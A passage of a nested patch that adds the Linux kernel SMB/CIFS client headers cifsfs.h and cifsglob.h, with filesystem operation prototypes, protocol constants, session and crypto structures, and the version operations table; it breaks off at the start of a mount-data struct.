++++ b/fs/smb/client/cifsfs.h
+@@ -0,0 +1,161 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002, 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFSFS_H
++#define _CIFSFS_H
++
++#include <linux/hash.h>
++
++#define ROOT_I 2
++
++/*
++ * ino_t is 32-bits on 32-bit arch. We have to squash the 64-bit value down
++ * so that it will fit. We use hash_64 to convert the value to 31 bits, and
++ * then add 1, to ensure that we don't end up with a 0 as the value.
++ */
++static inline ino_t
++cifs_uniqueid_to_ino_t(u64 fileid)
++{
++	if ((sizeof(ino_t)) < (sizeof(u64)))
++		return (ino_t)hash_64(fileid, (sizeof(ino_t) * 8) - 1) + 1;
++
++	return (ino_t)fileid;
++}
++
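++/* cache the dentry revalidation timestamp in dentry->d_fsdata */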
++static inline void cifs_set_time(struct dentry *dentry, unsigned long time)
++{
++	dentry->d_fsdata = (void *) time;
++}
++
++static inline unsigned long cifs_get_time(struct dentry *dentry)
++{
++	return (unsigned long) dentry->d_fsdata;
++}
++
++extern struct file_system_type cifs_fs_type, smb3_fs_type;
++extern const struct address_space_operations cifs_addr_ops;
++extern const struct address_space_operations cifs_addr_ops_smallbuf;
++
++/* Functions related to super block operations */
++extern void cifs_sb_active(struct super_block *sb);
++extern void cifs_sb_deactive(struct super_block *sb);
++
++/* Functions related to inodes */
++extern const struct inode_operations cifs_dir_inode_ops;
++extern struct inode *cifs_root_iget(struct super_block *);
++extern int cifs_create(struct user_namespace *, struct inode *,
++		       struct dentry *, umode_t, bool excl);
++extern int cifs_atomic_open(struct inode *, struct dentry *,
++			    struct file *, unsigned, umode_t);
++extern struct dentry *cifs_lookup(struct inode *, struct dentry *,
++				  unsigned int);
++extern int cifs_unlink(struct inode *dir, struct dentry *dentry);
++extern int cifs_hardlink(struct dentry *, struct inode *, struct dentry *);
++extern int cifs_mknod(struct user_namespace *, struct inode *, struct dentry *,
++		      umode_t, dev_t);
++extern int cifs_mkdir(struct user_namespace *, struct inode *, struct dentry *,
++		      umode_t);
++extern int cifs_rmdir(struct inode *, struct dentry *);
++extern int cifs_rename2(struct user_namespace *, struct inode *,
++			struct dentry *, struct inode *, struct dentry *,
++			unsigned int);
++extern int cifs_revalidate_file_attr(struct file *filp);
++extern int cifs_revalidate_dentry_attr(struct dentry *);
++extern int cifs_revalidate_file(struct file *filp);
++extern int cifs_revalidate_dentry(struct dentry *);
++extern int cifs_invalidate_mapping(struct inode *inode);
++extern int cifs_revalidate_mapping(struct inode *inode);
++extern int cifs_zap_mapping(struct inode *inode);
++extern int cifs_getattr(struct user_namespace *, const struct path *,
++			struct kstat *, u32, unsigned int);
++extern int cifs_setattr(struct user_namespace *, struct dentry *,
++			struct iattr *);
++extern int cifs_fiemap(struct inode *, struct fiemap_extent_info *, u64 start,
++		       u64 len);
++
++extern const struct inode_operations cifs_file_inode_ops;
++extern const struct inode_operations cifs_symlink_inode_ops;
++extern const struct inode_operations cifs_dfs_referral_inode_operations;
++
++
++/* Functions related to files and directories */
++extern const struct file_operations cifs_file_ops;
++extern const struct file_operations cifs_file_direct_ops; /* if directio mnt */
++extern const struct file_operations cifs_file_strict_ops; /* if strictio mnt */
++extern const struct file_operations cifs_file_nobrl_ops; /* no brlocks */
++extern const struct file_operations cifs_file_direct_nobrl_ops;
++extern const struct file_operations cifs_file_strict_nobrl_ops;
++extern int cifs_open(struct inode *inode, struct file *file);
++extern int cifs_close(struct inode *inode, struct file *file);
++extern int cifs_closedir(struct inode *inode, struct file *file);
++extern ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to);
++extern ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from);
++extern ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from);
++extern ssize_t cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from);
++extern int cifs_flock(struct file *pfile, int cmd, struct file_lock *plock);
++extern int cifs_lock(struct file *, int, struct file_lock *);
++extern int cifs_fsync(struct file *, loff_t, loff_t, int);
++extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
++extern int cifs_flush(struct file *, fl_owner_t id);
++extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
++extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
++extern const struct file_operations cifs_dir_ops;
++extern int cifs_dir_open(struct inode *inode, struct file *file);
++extern int cifs_readdir(struct file *file, struct dir_context *ctx);
++
++/* Functions related to dir entries */
++extern const struct dentry_operations cifs_dentry_ops;
++extern const struct dentry_operations cifs_ci_dentry_ops;
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
++#else
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
++#endif
++
++/* Functions related to symlinks */
++extern const char *cifs_get_link(struct dentry *, struct inode *,
++			struct delayed_call *);
++extern int cifs_symlink(struct user_namespace *mnt_userns, struct inode *inode,
++			struct dentry *direntry, const char *symname);
++
++#ifdef CONFIG_CIFS_XATTR
++extern const struct xattr_handler *cifs_xattr_handlers[];
++extern ssize_t	cifs_listxattr(struct dentry *, char *, size_t);
++#else
++# define cifs_xattr_handlers NULL
++# define cifs_listxattr NULL
++#endif
++
++extern ssize_t cifs_file_copychunk_range(unsigned int xid,
++					struct file *src_file, loff_t off,
++					struct file *dst_file, loff_t destoff,
++					size_t len, unsigned int flags);
++
++extern long cifs_ioctl(struct file *filep, unsigned int cmd, unsigned long arg);
++extern void cifs_setsize(struct inode *inode, loff_t offset);
++extern int cifs_truncate_page(struct address_space *mapping, loff_t from);
++
++struct smb3_fs_context;
++extern struct dentry *cifs_smb3_do_mount(struct file_system_type *fs_type,
++					 int flags, struct smb3_fs_context *ctx);
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++extern const struct export_operations cifs_export_ops;
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
++/* when changing internal version - update following two lines at same time */
++#define SMB3_PRODUCT_BUILD 40
++#define CIFS_VERSION   "2.40"
++#endif				/* _CIFSFS_H */
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+new file mode 100644
+index 0000000000000..a37afbb7e399f
+--- /dev/null
++++ b/fs/smb/client/cifsglob.h
+@@ -0,0 +1,2208 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *
++ */
++#ifndef _CIFS_GLOB_H
++#define _CIFS_GLOB_H
++
++#include <linux/in.h>
++#include <linux/in6.h>
++#include <linux/inet.h>
++#include <linux/slab.h>
++#include <linux/scatterlist.h>
++#include <linux/mm.h>
++#include <linux/mempool.h>
++#include <linux/workqueue.h>
++#include <linux/utsname.h>
++#include <linux/sched/mm.h>
++#include <linux/netfs.h>
++#include "cifs_fs_sb.h"
++#include "cifsacl.h"
++#include <crypto/internal/hash.h>
++#include <uapi/linux/cifs/cifs_mount.h>
++#include "../common/smb2pdu.h"
++#include "smb2pdu.h"
++
++#define SMB_PATH_MAX 260
++#define CIFS_PORT 445
++#define RFC1001_PORT 139
++
++/*
++ * The sizes of various internal tables and strings
++ */
++#define MAX_UID_INFO 16
++#define MAX_SES_INFO 2
++#define MAX_TCON_INFO 4
++
++#define MAX_TREE_SIZE (2 + CIFS_NI_MAXHOST + 1 + CIFS_MAX_SHARE_LEN + 1)
++
++#define CIFS_MIN_RCV_POOL 4
++
++#define MAX_REOPEN_ATT	5 /* these many maximum attempts to reopen a file */
++/*
++ * default attribute cache timeout (jiffies)
++ */
++#define CIFS_DEF_ACTIMEO (1 * HZ)
++
++/*
++ * max attribute cache timeout (jiffies) - 2^30
++ */
++#define CIFS_MAX_ACTIMEO (1 << 30)
++
++/*
++ * Max persistent and resilient handle timeout (milliseconds).
++ * Windows durable max was 960000 (16 minutes)
++ */
++#define SMB3_MAX_HANDLE_TIMEOUT 960000
++
++/*
++ * MAX_REQ is the maximum number of requests that WE will send
++ * on one socket concurrently.
++ */
++#define CIFS_MAX_REQ 32767
++
++#define RFC1001_NAME_LEN 15
++#define RFC1001_NAME_LEN_WITH_NULL (RFC1001_NAME_LEN + 1)
++
++/* maximum length of ip addr as a string (including ipv6 and sctp) */
++#define SERVER_NAME_LENGTH 80
++#define SERVER_NAME_LEN_WITH_NULL     (SERVER_NAME_LENGTH + 1)
++
++/* echo interval in seconds */
++#define SMB_ECHO_INTERVAL_MIN 1
++#define SMB_ECHO_INTERVAL_MAX 600
++#define SMB_ECHO_INTERVAL_DEFAULT 60
++
++/* dns resolution intervals in seconds */
++#define SMB_DNS_RESOLVE_INTERVAL_MIN     120
++#define SMB_DNS_RESOLVE_INTERVAL_DEFAULT 600
++
++/* smb multichannel query server interfaces interval in seconds */
++#define SMB_INTERFACE_POLL_INTERVAL	600
++
++/* maximum number of PDUs in one compound */
++#define MAX_COMPOUND 5
++
++/*
++ * Default number of credits to keep available for SMB3.
++ * This value is chosen somewhat arbitrarily. The Windows client
++ * defaults to 128 credits, the Windows server allows clients up to
++ * 512 credits (or 8K for later versions), and the NetApp server
++ * does not limit clients at all.  Choose a high enough default value
++ * such that the client shouldn't limit performance, but allow mount
++ * to override (until you approach 64K, where we limit credits to 65000
++ * to reduce the possibility of seeing more server credit overflow bugs).
++ */
++#define SMB2_MAX_CREDITS_AVAILABLE 32000
++
++#include "cifspdu.h"
++
++#ifndef XATTR_DOS_ATTRIB
++#define XATTR_DOS_ATTRIB "user.DOSATTRIB"
++#endif
++
++#define CIFS_MAX_WORKSTATION_LEN  (__NEW_UTS_LEN + 1)  /* reasonable max for client */
++
++/*
++ * CIFS vfs client status information (based on what we know).
++ */
++
++/* associated with each connection */
++enum statusEnum {
++	CifsNew = 0,
++	CifsGood,
++	CifsExiting,
++	CifsNeedReconnect,
++	CifsNeedNegotiate,
++	CifsInNegotiate,
++};
++
++/* associated with each smb session */
++enum ses_status_enum {
++	SES_NEW = 0,
++	SES_GOOD,
++	SES_EXITING,
++	SES_NEED_RECON,
++	SES_IN_SETUP
++};
++
++/* associated with each tree connection to the server */
++enum tid_status_enum {
++	TID_NEW = 0,
++	TID_GOOD,
++	TID_EXITING,
++	TID_NEED_RECON,
++	TID_NEED_TCON,
++	TID_IN_TCON,
++	TID_NEED_FILES_INVALIDATE, /* currently unused */
++	TID_IN_FILES_INVALIDATE
++};
++
++enum securityEnum {
++	Unspecified = 0,	/* not specified */
++	NTLMv2,			/* Legacy NTLM auth with NTLMv2 hash */
++	RawNTLMSSP,		/* NTLMSSP without SPNEGO, NTLMv2 hash */
++	Kerberos,		/* Kerberos via SPNEGO */
++};
++
++struct session_key {
++	unsigned int len;
++	char *response;
++};
++
++/* crypto hashing related structure/fields, not specific to a sec mech */
++struct cifs_secmech {
++	struct shash_desc *hmacmd5; /* hmacmd5 hash function, for NTLMv2/CR1 hashes */
++	struct shash_desc *md5; /* md5 hash function, for CIFS/SMB1 signatures */
++	struct shash_desc *hmacsha256; /* hmac-sha256 hash function, for SMB2 signatures */
++	struct shash_desc *sha512; /* sha512 hash function, for SMB3.1.1 preauth hash */
++	struct shash_desc *aes_cmac; /* block-cipher based MAC function, for SMB3 signatures */
++
++	struct crypto_aead *enc; /* smb3 encryption AEAD TFM (AES-CCM and AES-GCM) */
++	struct crypto_aead *dec; /* smb3 decryption AEAD TFM (AES-CCM and AES-GCM) */
++};
++
++/* per smb session structure/fields */
++struct ntlmssp_auth {
++	bool sesskey_per_smbsess; /* whether session key is per smb session */
++	__u32 client_flags; /* sent by client in type 1 ntlmssp exchange */
++	__u32 server_flags; /* sent by server in type 2 ntlmssp exchange */
++	unsigned char ciphertext[CIFS_CPHTXT_SIZE]; /* sent to server */
++	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlmssp */
++};
++
++struct cifs_cred {
++	int uid;
++	int gid;
++	int mode;
++	int cecount;
++	struct cifs_sid osid;
++	struct cifs_sid gsid;
++	struct cifs_ntace *ntaces;
++	struct cifs_ace *aces;
++};
++
++struct cifs_open_info_data {
++	char *symlink_target;
++	union {
++		struct smb2_file_all_info fi;
++		struct smb311_posix_qinfo posix_fi;
++	};
++};
++
++static inline void cifs_free_open_info(struct cifs_open_info_data *data)
++{
++	kfree(data->symlink_target);
++}
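++
++/*
++ * Illustrative sketch (not part of the original patch): the usual pattern
++ * is to zero-initialize the struct, let a query call fill it in (possibly
++ * allocating symlink_target), and then release it:
++ *
++ *	struct cifs_open_info_data data = {};
++ *
++ *	// ... a query_path_info-style call fills in &data ...
++ *	cifs_free_open_info(&data);
++ */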
++
++/*
++ *****************************************************************
++ * Except the CIFS PDUs themselves all the
++ * globally interesting structs should go here
++ *****************************************************************
++ */
++
++/*
++ * An smb_rqst represents a complete request to be issued to a server. It's
++ * formed by a kvec array, followed by an array of pages. Page data is assumed
++ * to start at the beginning of the first page.
++ */
++struct smb_rqst {
++	struct kvec	*rq_iov;	/* array of kvecs */
++	unsigned int	rq_nvec;	/* number of kvecs in array */
++	struct page	**rq_pages;	/* pointer to array of page ptrs */
++	unsigned int	rq_offset;	/* the offset to the 1st page */
++	unsigned int	rq_npages;	/* number pages in array */
++	unsigned int	rq_pagesz;	/* page size to use */
++	unsigned int	rq_tailsz;	/* length of last page */
++};
++
++struct mid_q_entry;
++struct TCP_Server_Info;
++struct cifsFileInfo;
++struct cifs_ses;
++struct cifs_tcon;
++struct dfs_info3_param;
++struct cifs_fattr;
++struct smb3_fs_context;
++struct cifs_fid;
++struct cifs_readdata;
++struct cifs_writedata;
++struct cifs_io_parms;
++struct cifs_search_info;
++struct cifsInodeInfo;
++struct cifs_open_parms;
++struct cifs_credits;
++
++struct smb_version_operations {
++	int (*send_cancel)(struct TCP_Server_Info *, struct smb_rqst *,
++			   struct mid_q_entry *);
++	bool (*compare_fids)(struct cifsFileInfo *, struct cifsFileInfo *);
++	/* setup request: allocate mid, sign message */
++	struct mid_q_entry *(*setup_request)(struct cifs_ses *,
++					     struct TCP_Server_Info *,
++					     struct smb_rqst *);
++	/* setup async request: allocate mid, sign message */
++	struct mid_q_entry *(*setup_async_request)(struct TCP_Server_Info *,
++						struct smb_rqst *);
++	/* check response: verify signature, map error */
++	int (*check_receive)(struct mid_q_entry *, struct TCP_Server_Info *,
++			     bool);
++	void (*add_credits)(struct TCP_Server_Info *server,
++			    const struct cifs_credits *credits,
++			    const int optype);
++	void (*set_credits)(struct TCP_Server_Info *, const int);
++	int * (*get_credits_field)(struct TCP_Server_Info *, const int);
++	unsigned int (*get_credits)(struct mid_q_entry *);
++	__u64 (*get_next_mid)(struct TCP_Server_Info *);
++	void (*revert_current_mid)(struct TCP_Server_Info *server,
++				   const unsigned int val);
++	/* data offset from read response message */
++	unsigned int (*read_data_offset)(char *);
++	/*
++	 * Data length from read response message
++	 * When in_remaining is true, the returned data length is in
++	 * message field DataRemaining for out-of-band data read (e.g. through
++	 * Memory Registration RDMA write in SMBD).
++	 * Otherwise, the returned data length is in message field DataLength.
++	 */
++	unsigned int (*read_data_length)(char *, bool in_remaining);
++	/* map smb to linux error */
++	int (*map_error)(char *, bool);
++	/* find mid corresponding to the response message */
++	struct mid_q_entry * (*find_mid)(struct TCP_Server_Info *, char *);
++	void (*dump_detail)(void *buf, struct TCP_Server_Info *ptcp_info);
++	void (*clear_stats)(struct cifs_tcon *);
++	void (*print_stats)(struct seq_file *m, struct cifs_tcon *);
++	void (*dump_share_caps)(struct seq_file *, struct cifs_tcon *);
++	/* verify the message */
++	int (*check_message)(char *, unsigned int, struct TCP_Server_Info *);
++	bool (*is_oplock_break)(char *, struct TCP_Server_Info *);
++	int (*handle_cancelled_mid)(struct mid_q_entry *, struct TCP_Server_Info *);
++	void (*downgrade_oplock)(struct TCP_Server_Info *server,
++				 struct cifsInodeInfo *cinode, __u32 oplock,
++				 unsigned int epoch, bool *purge_cache);
++	/* process transaction2 response */
++	bool (*check_trans2)(struct mid_q_entry *, struct TCP_Server_Info *,
++			     char *, int);
++	/* check if we need to negotiate */
++	bool (*need_neg)(struct TCP_Server_Info *);
++	/* negotiate to the server */
++	int (*negotiate)(const unsigned int xid,
++			 struct cifs_ses *ses,
++			 struct TCP_Server_Info *server);
++	/* set negotiated write size */
++	unsigned int (*negotiate_wsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
++	/* set negotiated read size */
++	unsigned int (*negotiate_rsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
++	/* setup smb session */
++	int (*sess_setup)(const unsigned int, struct cifs_ses *,
++			  struct TCP_Server_Info *server,
++			  const struct nls_table *);
++	/* close smb session */
++	int (*logoff)(const unsigned int, struct cifs_ses *);
++	/* connect to a server share */
++	int (*tree_connect)(const unsigned int, struct cifs_ses *, const char *,
++			    struct cifs_tcon *, const struct nls_table *);
++	/* close tree connection */
++	int (*tree_disconnect)(const unsigned int, struct cifs_tcon *);
++	/* get DFS referrals */
++	int (*get_dfs_refer)(const unsigned int, struct cifs_ses *,
++			     const char *, struct dfs_info3_param **,
++			     unsigned int *, const struct nls_table *, int);
++	/* informational QFS call */
++	void (*qfs_tcon)(const unsigned int, struct cifs_tcon *,
++			 struct cifs_sb_info *);
++	/* check if a path is accessible or not */
++	int (*is_path_accessible)(const unsigned int, struct cifs_tcon *,
++				  struct cifs_sb_info *, const char *);
++	/* query path data from the server */
++	int (*query_path_info)(const unsigned int xid, struct cifs_tcon *tcon,
++			       struct cifs_sb_info *cifs_sb, const char *full_path,
++			       struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
++	/* query file data from the server */
++	int (*query_file_info)(const unsigned int xid, struct cifs_tcon *tcon,
++			       struct cifsFileInfo *cfile, struct cifs_open_info_data *data);
++	/* query reparse tag from srv to determine which type of special file */
++	int (*query_reparse_tag)(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *path,
++				__u32 *reparse_tag);
++	/* get server index number */
++	int (*get_srv_inum)(const unsigned int xid, struct cifs_tcon *tcon,
++			    struct cifs_sb_info *cifs_sb, const char *full_path, u64 *uniqueid,
++			    struct cifs_open_info_data *data);
++	/* set size by path */
++	int (*set_path_size)(const unsigned int, struct cifs_tcon *,
++			     const char *, __u64, struct cifs_sb_info *, bool);
++	/* set size by file handle */
++	int (*set_file_size)(const unsigned int, struct cifs_tcon *,
++			     struct cifsFileInfo *, __u64, bool);
++	/* set attributes */
++	int (*set_file_info)(struct inode *, const char *, FILE_BASIC_INFO *,
++			     const unsigned int);
++	int (*set_compression)(const unsigned int, struct cifs_tcon *,
++			       struct cifsFileInfo *);
++	/* check if we can send an echo or not */
++	bool (*can_echo)(struct TCP_Server_Info *);
++	/* send echo request */
++	int (*echo)(struct TCP_Server_Info *);
++	/* create directory */
++	int (*posix_mkdir)(const unsigned int xid, struct inode *inode,
++			umode_t mode, struct cifs_tcon *tcon,
++			const char *full_path,
++			struct cifs_sb_info *cifs_sb);
++	int (*mkdir)(const unsigned int xid, struct inode *inode, umode_t mode,
++		     struct cifs_tcon *tcon, const char *name,
++		     struct cifs_sb_info *sb);
++	/* set info on created directory */
++	void (*mkdir_setinfo)(struct inode *, const char *,
++			      struct cifs_sb_info *, struct cifs_tcon *,
++			      const unsigned int);
++	/* remove directory */
++	int (*rmdir)(const unsigned int, struct cifs_tcon *, const char *,
++		     struct cifs_sb_info *);
++	/* unlink file */
++	int (*unlink)(const unsigned int, struct cifs_tcon *, const char *,
++		      struct cifs_sb_info *);
++	/* open, rename and delete file */
++	int (*rename_pending_delete)(const char *, struct dentry *,
++				     const unsigned int);
++	/* send rename request */
++	int (*rename)(const unsigned int, struct cifs_tcon *, const char *,
++		      const char *, struct cifs_sb_info *);
++	/* send create hardlink request */
++	int (*create_hardlink)(const unsigned int, struct cifs_tcon *,
++			       const char *, const char *,
++			       struct cifs_sb_info *);
++	/* query symlink target */
++	int (*query_symlink)(const unsigned int, struct cifs_tcon *,
++			     struct cifs_sb_info *, const char *,
++			     char **, bool);
++	/* open a file for non-posix mounts */
++	int (*open)(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++		    void *buf);
++	/* set fid protocol-specific info */
++	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
++	/* close a file */
++	void (*close)(const unsigned int, struct cifs_tcon *,
++		      struct cifs_fid *);
++	/* close a file, returning file attributes and timestamps */
++	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
++		      struct cifsFileInfo *pfile_info);
++	/* send a flush request to the server */
++	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
++	/* async read from the server */
++	int (*async_readv)(struct cifs_readdata *);
++	/* async write to the server */
++	int (*async_writev)(struct cifs_writedata *,
++			    void (*release)(struct kref *));
++	/* sync read from the server */
++	int (*sync_read)(const unsigned int, struct cifs_fid *,
++			 struct cifs_io_parms *, unsigned int *, char **,
++			 int *);
++	/* sync write to the server */
++	int (*sync_write)(const unsigned int, struct cifs_fid *,
++			  struct cifs_io_parms *, unsigned int *, struct kvec *,
++			  unsigned long);
++	/* open dir, start readdir */
++	int (*query_dir_first)(const unsigned int, struct cifs_tcon *,
++			       const char *, struct cifs_sb_info *,
++			       struct cifs_fid *, __u16,
++			       struct cifs_search_info *);
++	/* continue readdir */
++	int (*query_dir_next)(const unsigned int, struct cifs_tcon *,
++			      struct cifs_fid *,
++			      __u16, struct cifs_search_info *srch_inf);
++	/* close dir */
++	int (*close_dir)(const unsigned int, struct cifs_tcon *,
++			 struct cifs_fid *);
++	/* calculate a size of SMB message */
++	unsigned int (*calc_smb_size)(void *buf);
++	/* check for STATUS_PENDING and process the response if yes */
++	bool (*is_status_pending)(char *buf, struct TCP_Server_Info *server);
++	/* check for STATUS_NETWORK_SESSION_EXPIRED */
++	bool (*is_session_expired)(char *);
++	/* send oplock break response */
++	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
++			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
++	/* query remote filesystem */
++	int (*queryfs)(const unsigned int, struct cifs_tcon *,
++		       struct cifs_sb_info *, struct kstatfs *);
++	/* send mandatory brlock to the server */
++	int (*mand_lock)(const unsigned int, struct cifsFileInfo *, __u64,
++			 __u64, __u32, int, int, bool);
++	/* unlock range of mandatory locks */
++	int (*mand_unlock_range)(struct cifsFileInfo *, struct file_lock *,
++				 const unsigned int);
++	/* push brlocks from the cache to the server */
++	int (*push_mand_locks)(struct cifsFileInfo *);
++	/* get lease key of the inode */
++	void (*get_lease_key)(struct inode *, struct cifs_fid *);
++	/* set lease key of the inode */
++	void (*set_lease_key)(struct inode *, struct cifs_fid *);
++	/* generate new lease key */
++	void (*new_lease_key)(struct cifs_fid *);
++	int (*generate_signingkey)(struct cifs_ses *ses,
++				   struct TCP_Server_Info *server);
++	int (*calc_signature)(struct smb_rqst *, struct TCP_Server_Info *,
++				bool allocate_crypto);
++	int (*set_integrity)(const unsigned int, struct cifs_tcon *tcon,
++			     struct cifsFileInfo *src_file);
++	int (*enum_snapshots)(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifsFileInfo *src_file, void __user *);
++	int (*notify)(const unsigned int xid, struct file *pfile,
++			     void __user *pbuf, bool return_changes);
++	int (*query_mf_symlink)(unsigned int, struct cifs_tcon *,
++				struct cifs_sb_info *, const unsigned char *,
++				char *, unsigned int *);
++	int (*create_mf_symlink)(unsigned int, struct cifs_tcon *,
++				 struct cifs_sb_info *, const unsigned char *,
++				 char *, unsigned int *);
++	/* if we can do cache read operations */
++	bool (*is_read_op)(__u32);
++	/* set oplock level for the inode */
++	void (*set_oplock_level)(struct cifsInodeInfo *, __u32, unsigned int,
++				 bool *);
++	/* create lease context buffer for CREATE request */
++	char * (*create_lease_buf)(u8 *lease_key, u8 oplock);
++	/* parse lease context buffer and return oplock/epoch info */
++	__u8 (*parse_lease_buf)(void *buf, unsigned int *epoch, char *lkey);
++	ssize_t (*copychunk_range)(const unsigned int,
++			struct cifsFileInfo *src_file,
++			struct cifsFileInfo *target_file,
++			u64 src_off, u64 len, u64 dest_off);
++	int (*duplicate_extents)(const unsigned int, struct cifsFileInfo *src,
++			struct cifsFileInfo *target_file, u64 src_off, u64 len,
++			u64 dest_off);
++	int (*validate_negotiate)(const unsigned int, struct cifs_tcon *);
++	ssize_t (*query_all_EAs)(const unsigned int, struct cifs_tcon *,
++			const unsigned char *, const unsigned char *, char *,
++			size_t, struct cifs_sb_info *);
++	int (*set_EA)(const unsigned int, struct cifs_tcon *, const char *,
++			const char *, const void *, const __u16,
++			const struct nls_table *, struct cifs_sb_info *);
++	struct cifs_ntsd * (*get_acl)(struct cifs_sb_info *, struct inode *,
++			const char *, u32 *, u32);
++	struct cifs_ntsd * (*get_acl_by_fid)(struct cifs_sb_info *,
++			const struct cifs_fid *, u32 *, u32);
++	int (*set_acl)(struct cifs_ntsd *, __u32, struct inode *, const char *,
++			int);
++	/* writepages retry size */
++	unsigned int (*wp_retry_size)(struct inode *);
++	/* get mtu credits */
++	int (*wait_mtu_credits)(struct TCP_Server_Info *, unsigned int,
++				unsigned int *, struct cifs_credits *);
++	/* adjust previously taken mtu credits to request size */
++	int (*adjust_credits)(struct TCP_Server_Info *server,
++			      struct cifs_credits *credits,
++			      const unsigned int payload_size);
++	/* check if we need to issue closedir */
++	bool (*dir_needs_close)(struct cifsFileInfo *);
++	long (*fallocate)(struct file *, struct cifs_tcon *, int, loff_t,
++			  loff_t);
++	/* init transform request - used for encryption for now */
++	int (*init_transform_rq)(struct TCP_Server_Info *, int num_rqst,
++				 struct smb_rqst *, struct smb_rqst *);
++	int (*is_transform_hdr)(void *buf);
++	int (*receive_transform)(struct TCP_Server_Info *,
++				 struct mid_q_entry **, char **, int *);
++	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
++			    enum securityEnum);
++	int (*next_header)(char *);
++	/* ioctl passthrough for query_info */
++	int (*ioctl_query_info)(const unsigned int xid,
++				struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb,
++				__le16 *path, int is_dir,
++				unsigned long p);
++	/* make unix special files (block, char, fifo, socket) */
++	int (*make_node)(unsigned int xid,
++			 struct inode *inode,
++			 struct dentry *dentry,
++			 struct cifs_tcon *tcon,
++			 const char *full_path,
++			 umode_t mode,
++			 dev_t device_number);
++	/* version specific fiemap implementation */
++	int (*fiemap)(struct cifs_tcon *tcon, struct cifsFileInfo *,
++		      struct fiemap_extent_info *, u64, u64);
++	/* version specific llseek implementation */
++	loff_t (*llseek)(struct file *, struct cifs_tcon *, loff_t, int);
++	/* Check for STATUS_IO_TIMEOUT */
++	bool (*is_status_io_timeout)(char *buf);
++	/* Check for STATUS_NETWORK_NAME_DELETED */
++	void (*is_network_name_deleted)(char *buf, struct TCP_Server_Info *srv);
++};
++
++struct smb_version_values {
++	char		*version_string;
++	__u16		protocol_id;
++	__u32		req_capabilities;
++	__u32		large_lock_type;
++	__u32		exclusive_lock_type;
++	__u32		shared_lock_type;
++	__u32		unlock_lock_type;
++	size_t		header_preamble_size;
++	size_t		header_size;
++	size_t		max_header_size;
++	size_t		read_rsp_size;
++	__le16		lock_cmd;
++	unsigned int	cap_unix;
++	unsigned int	cap_nt_find;
++	unsigned int	cap_large_files;
++	__u16		signing_enabled;
++	__u16		signing_required;
++	size_t		create_lease_size;
++};
++
++#define HEADER_SIZE(server) (server->vals->header_size)
++#define MAX_HEADER_SIZE(server) (server->vals->max_header_size)
++#define HEADER_PREAMBLE_SIZE(server) (server->vals->header_preamble_size)
++#define MID_HEADER_SIZE(server) (HEADER_SIZE(server) - 1 - HEADER_PREAMBLE_SIZE(server))
++
++/*
++ * CIFS superblock mount flags (mnt_cifs_flags) to consider when
++ * trying to reuse an existing superblock for a new mount
++ */
++#define CIFS_MOUNT_MASK (CIFS_MOUNT_NO_PERM | CIFS_MOUNT_SET_UID | \
++			 CIFS_MOUNT_SERVER_INUM | CIFS_MOUNT_DIRECT_IO | \
++			 CIFS_MOUNT_NO_XATTR | CIFS_MOUNT_MAP_SPECIAL_CHR | \
++			 CIFS_MOUNT_MAP_SFM_CHR | \
++			 CIFS_MOUNT_UNX_EMUL | CIFS_MOUNT_NO_BRL | \
++			 CIFS_MOUNT_CIFS_ACL | CIFS_MOUNT_OVERR_UID | \
++			 CIFS_MOUNT_OVERR_GID | CIFS_MOUNT_DYNPERM | \
++			 CIFS_MOUNT_NOPOSIXBRL | CIFS_MOUNT_NOSSYNC | \
++			 CIFS_MOUNT_FSCACHE | CIFS_MOUNT_MF_SYMLINKS | \
++			 CIFS_MOUNT_MULTIUSER | CIFS_MOUNT_STRICT_IO | \
++			 CIFS_MOUNT_CIFS_BACKUPUID | CIFS_MOUNT_CIFS_BACKUPGID | \
++			 CIFS_MOUNT_UID_FROM_ACL | CIFS_MOUNT_NO_HANDLE_CACHE | \
++			 CIFS_MOUNT_NO_DFS | CIFS_MOUNT_MODE_FROM_SID | \
++			 CIFS_MOUNT_RO_CACHE | CIFS_MOUNT_RW_CACHE)
++
++/*
++ * Generic VFS superblock mount flags (s_flags) to consider when
++ * trying to reuse an existing superblock for a new mount
++ */
++#define CIFS_MS_MASK (SB_RDONLY | SB_MANDLOCK | SB_NOEXEC | SB_NOSUID | \
++		      SB_NODEV | SB_SYNCHRONOUS)
++
++struct cifs_mnt_data {
